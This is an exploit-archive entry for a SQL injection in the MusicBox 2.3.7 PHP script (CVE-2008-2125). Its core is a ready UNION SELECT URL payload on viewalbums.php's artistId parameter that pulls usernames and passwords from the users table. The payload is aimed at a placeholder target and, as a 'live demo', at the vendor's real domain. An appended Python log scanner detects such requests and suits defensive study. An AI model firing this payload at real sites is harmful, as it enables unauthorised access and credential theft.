MusicBox 2.3.7 - 'artistId' SQL Injection

Author: HaCkeR_EgY
type: webapps
platform: php
date_added: 2008-05-06  
date_updated: 2016-11-28  
verified: 1  
codes: OSVDB-44833;CVE-2008-2125  

raw file: 5560.txt  
#########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[<>]Author: HaCkeR-EgY

[<>]H^0mE: www.pal-hacker.com ,  atsdp.com

[<>]CONTact: hacker_EGY@hotmail.com
===========================================================
[<>]Script : Musicbox

[<>]version : Version 2.3.6 / 2.3.7

[<>]Script Price: Only $ 255.00

[<>]Download : www.musicboxv2.com
============================================================

[<>] D0RK : ... you know

[<>] ExPLO!t :

  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*


[<>] live DemO :

  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*

==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-07]
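
A defender-side check for the request pattern shown in this advisory, as an added example (not part of the original advisory or of the MusicBox code): it scans web access logs for `viewalbums.php` requests whose `artistId` is not a plain integer and flags UNION SELECT payloads after URL-decoding and treating SQL comments as whitespace. The log lines are constructed, and the common-log layout and the premise that legitimate `artistId` values are integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the page); IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /version2.3.7/viewalbums.php?artistId=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,2,3/**/from/**/users/* HTTP/1.1" 200 6034',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /version2.3.7/viewalbums.php?artistId=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 6011',
    '198.51.100.20 - - [01/Jan/2024:10:00:12 +0000] "GET /version2.3.7/viewalbums.php?artistId=12abc HTTP/1.1" 200 310',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
OPEN_COMMENT = re.compile(r"/\*.*\Z", re.S)       # trailing, unterminated /*
UNION_SELECT = re.compile(r"\bunion\b(?: all| distinct)? select\b")

def normalize(value):
    """Replace SQL comments with spaces, collapse whitespace, lowercase."""
    value = INLINE_COMMENT.sub(" ", value)
    value = OPEN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def classify(value):
    """Assumption: a legitimate artistId is a non-negative integer."""
    if re.fullmatch(r"[0-9]+", value):
        return "ok"
    if UNION_SELECT.search(normalize(value)):
        return "sqli-union"
    return "non-numeric"

def scan(lines, script="viewalbums.php", param="artistId"):
    """Return (client_ip, verdict, normalized_value) for each suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        url = urlsplit(match.group(2))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared decoded
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify(value)
            if verdict != "ok":
                findings.append((match.group(1), verdict, normalize(value)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `non-numeric` verdict is worth alerting on as well: it catches probing that never reaches a UNION clause, and the same integer check applied server-side before the query is built closes the injection point.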